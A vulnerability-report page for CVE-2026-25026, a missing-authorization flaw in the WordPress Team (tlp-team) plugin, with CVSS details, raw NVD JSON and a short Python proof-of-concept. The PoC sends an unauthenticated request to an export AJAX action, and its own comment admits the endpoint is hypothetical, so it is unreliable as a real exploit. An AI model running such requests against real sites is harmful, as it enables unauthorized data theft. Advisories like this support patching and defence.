Security Vulnerability Report
中文
CVE-2026-25026 CVSS 7.5 HIGH

CVE-2026-25026

Published: 2026-03-25 17:16:42
Last Modified: 2026-04-24 16:32:54

Description

Missing Authorization vulnerability in RadiusTheme Team tlp-team allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Team: from n/a through <= 5.0.11.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

RadiusTheme Team (tlp-team) <= 5.0.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: RadiusTheme Team (tlp-team) < 5.0.11 - Missing Authorization PoC # Date: 2026-03-25 # Exploit Author: Security Analyst # Vendor Homepage: https://radiustheme.com/ # Software Link: https://wordpress.org/plugins/tlp-team/ # Version: <= 5.0.11 # CVE: CVE-2026-25026 import requests def exploit(target_url): """ Exploit Missing Authorization vulnerability to access sensitive data. """ # Example endpoint (hypothetical based on plugin structure) # Usually vulnerable plugins expose AJAX actions without capability checks. endpoint = "/wp-admin/admin-ajax.php?action=tlp_team_export_all" full_url = f"{target_url.rstrip('/')}{endpoint}" try: response = requests.get(full_url, timeout=10) if response.status_code == 200: print(f"[+] Success! Data retrieved from {full_url}") print(f"[+] Response snippet: {response.text[:200]}...") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example-wordpress-site.com" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25026", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:42.440", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in RadiusTheme Team tlp-team allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Team: from n/a through <= 5.0.11."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en RadiusTheme Team tlp-team permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Team: desde n/a hasta &lt;= 5.0.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tlp-team/vulnerability/wordpress-team-plugin-5-0-11-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}